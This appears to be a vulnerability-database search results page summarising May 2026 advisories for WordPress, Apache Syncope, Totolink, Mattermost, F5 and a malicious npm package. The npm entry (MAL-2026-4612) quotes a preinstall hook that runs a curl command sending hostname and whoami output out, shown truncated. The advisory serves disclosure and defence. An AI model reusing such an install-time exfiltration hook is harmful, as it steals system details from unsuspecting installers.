Lucene search
K

6408 matches found

Vulnrichment
Vulnrichment
added 2026/05/25 9:7 p.m.9 views

CVE-2026-24574 WordPress Export WP Page to Static HTML/CSS plugin <= 6.0.0 - Cross Site Request Forgery (CSRF) vulnerability

Cross-Site Request Forgery CSRF vulnerability in Recorp Export WP Page to Static HTML/CSS allows Cross Site Request Forgery. This issue affects Export WP Page to Static HTML/CSS: from n/a through 6.0.0...

6.5CVSS5.8AI score0.0014EPSS
Exploits0References1
Cvelist
Cvelist
added 2026/05/25 9:7 p.m.26 views

CVE-2026-24574 WordPress Export WP Page to Static HTML/CSS plugin <= 6.0.0 - Cross Site Request Forgery (CSRF) vulnerability

Cross-Site Request Forgery CSRF vulnerability in Recorp Export WP Page to Static HTML/CSS allows Cross Site Request Forgery. This issue affects Export WP Page to Static HTML/CSS: from n/a through 6.0.0...

6.5CVSS0.0014EPSS
Exploits0References1
EUVD
EUVD
added 2026/05/25 9:7 p.m.15 views

EUVD-2026-31743

Cross-Site Request Forgery CSRF vulnerability in Recorp Export WP Page to Static HTML/CSS allows Cross Site Request Forgery. This issue affects Export WP Page to Static HTML/CSS: from n/a through 6.0.0...

6.5CVSS5.8AI score0.0014EPSS
Exploits0References1
CVE
CVE
added 2026/05/25 9:7 p.m.28 views

CVE-2026-24574

CVE-2026-24574 concerns the WordPress plugin Export WP Page to Static HTML/CSS (versions up to and including 6.0.0). The issue is a Cross-Site Request Forgery (CSRF) vulnerability in this plugin, with CVSSv3.1: base score 6.5 (Medium). Attack vector: Network; attack complexity: Low; privileges re...

6.5CVSS5.8AI score0.0014EPSS
Exploits0References1
Patchstack
Patchstack
added 2026/05/25 9:6 p.m.15 views

WordPress Export WP Page to Static HTML/CSS plugin <= 6.0.0 - Cross Site Request Forgery (CSRF) vulnerability

Cross Site Request Forgery CSRF vulnerability discovered by Nabil Irawan in WordPress Plugin Export WP Page to Static HTML/CSS versions = 6.0.0...

6.5CVSS5.8AI score0.0014EPSS
Exploits0Affected Software1
ATTACKERKB
ATTACKERKB
added 2026/05/25 2:58 p.m.11 views

CVE-2026-42782

Improper Isolation or Compartmentalization vulnerability in Apache Syncope. An administrator with adequate entitlements for Implementations can create a malicious Groovy class containing untrusted code reaching a non-sandboxed execution path via the class static initializer. This issue affects...

6AI score0.00652EPSS
Exploits0References2Affected Software1
CVE
CVE
added 2026/05/25 2:58 p.m.27 views

CVE-2026-42782

CVE-2026-42782 affects Apache Syncope 3.0–3.0.16, 4.0–4.0.5, and 4.1.0, caused by improper isolation that lets an administrator with sufficient entitlements load a malicious Groovy class whose static initializer reaches a non-sandboxed execution path. Remediation is to upgrade to 4.0.6 or 4.1.1, ...

7.2CVSS6AI score0.00652EPSS
Exploits0References2Affected Software1
EUVD
EUVD
added 2026/05/25 2:58 p.m.16 views

EUVD-2026-31696

Improper Isolation or Compartmentalization vulnerability in Apache Syncope. An administrator with adequate entitlements for Implementations can create a malicious Groovy class containing untrusted code reaching a non-sandboxed execution path via the class static initializer. This issue affects...

6AI score0.00652EPSS
Exploits0References1
Vulnrichment
Vulnrichment
added 2026/05/25 2:58 p.m.15 views

CVE-2026-42782 Apache Syncope: Post-auth RCE via Groovy static

Improper Isolation or Compartmentalization vulnerability in Apache Syncope. An administrator with adequate entitlements for Implementations can create a malicious Groovy class containing untrusted code reaching a non-sandboxed execution path via the class static initializer. This issue affects...

6AI score0.00652EPSS
Exploits0References1
NVD
NVD
added 2026/05/25 12:16 a.m.16 views

CVE-2026-9408

A vulnerability was detected in Totolink A8000RU 7.1cu.643b20200521. Affected by this issue is the function setStaticDhcpRules of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. The manipulation of the argument enable results in os command injection. The attack may be...

10CVSS0.01732EPSS
Exploits0References5
Cvelist
Cvelist
added 2026/05/25 12:0 a.m.23 views

CVE-2026-9408 Totolink A8000RU Web Management cstecgi.cgi setStaticDhcpRules os command injection

A vulnerability was detected in Totolink A8000RU 7.1cu.643b20200521. Affected by this issue is the function setStaticDhcpRules of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. The manipulation of the argument enable results in os command injection. The attack may be...

10CVSS0.01732EPSS
Exploits0References5
Positive Technologies
Positive Technologies
added 2026/05/25 12:0 a.m.12 views

PT-2026-43128

Cross-Site Request Forgery CSRF vulnerability in Recorp Export WP Page to Static HTML/CSS allows Cross Site Request Forgery. This issue affects Export WP Page to Static HTML/CSS: from n/a through 6.0.0...

6.5CVSS5.8AI score0.0014EPSS
Exploits0References1
Positive Technologies
Positive Technologies
added 2026/05/25 12:0 a.m.16 views

PT-2026-43078

Name of the Vulnerable Software and Affected Versions Apache Syncope versions 3.0 through 3.0.16 Apache Syncope versions 4.0 through 4.0.5 Apache Syncope version 4.1.0 Description Improper Isolation or Compartmentalization allows an administrator with sufficient entitlements for Implementations t...

7.2CVSS6.2AI score0.00652EPSS
Exploits0References6
CNNVD
CNNVD
added 2026/05/25 12:0 a.m.11 views

WordPress plugin Export WP Page to Static HTML/CSS 跨站请求伪造漏洞

WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress is a blogging platform developed using the PHP language. The platform has the ability to set up a personal blog site on a PHP and MySQL based server.WordPress plugin is an application plugin. WordPress plugin...

6.5CVSS5.6AI score0.0014EPSS
Exploits0References1
OSV
OSV
added 2026/05/22 6:12 p.m.9 views

MAL-2026-4612 Malicious code in mmt-static (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 755d0176c106903bf2baaf14d0bb4df611bb719c2a7b0615e9b4487eadee1300 On npm install, the package's preinstall lifecycle hook executes node index.js && curl --data-urlencode "info=$hostname && whoami"...

5.8AI score
Exploits0References2
Packet Storm News
Packet Storm News
added 2026/05/22 12:0 a.m.12 views

Adversarial Vulnerability under Temporal Concept Drift: A Longitudinal Study of Android Malware Detection

We present a longitudinal, drift-aware evaluation of adversarial robustness across more than a decade of Android applications using static and dynamic feature representations extracted from emulator and real-device executions. The dataset is organized into yearly slices and evaluated under three...

5.8AI score
Exploits0
Packet Storm News
Packet Storm News
added 2026/05/22 12:0 a.m.9 views

angr 9.2.217

angr is an open-source binary analysis platform for Python. It combines both static and dynamic symbolic "concolic" analysis, providing tools to solve a variety of tasks...

5.8AI score
Exploits0
Snyk
Snyk
added 2026/05/21 11:46 a.m.10 views

Directory Traversal

Overview github.com/mattermost/mattermost/server/channels/app is a private-cloud Slack alternative Affected versions of this package are vulnerable to Directory Traversal in the integration action URL process. An attacker can execute arbitrary API calls with system administrator privileges by...

9.9CVSS6.4AI score0.00249EPSS
Exploits0References2
Packet Storm News
Packet Storm News
added 2026/05/21 12:0 a.m.21 views

Beyond Zero: Enterprise Security for the AI Era

The rise of autonomous AI agents and the accelerating velocity of corporate data access are stretching the application-centric model of zero trust security to its breaking point. This paper introduces Beyond Zero, a new security paradigm designed for the AI era. The Beyond Zero architecture...

5.8AI score
Exploits0
Tenable Nessus
Tenable Nessus
added 2026/05/21 12:0 a.m.12 views

F5 Networks BIG-IP : BIG-IP BFD vulnerability (K000150508)

The version of F5 Networks BIG-IP installed on the remote host is prior to 17.1.3 / 17.5.1. It is, therefore, affected by a vulnerability as referenced in the K000150508 advisory. When Bidirectional Forwarding Detection BFD is configured in Static and Dynamic routing protocols, undisclosed traffi...

6.3CVSS5.8AI score0.00293EPSS
Exploits0References2
Rows per page
Query Builder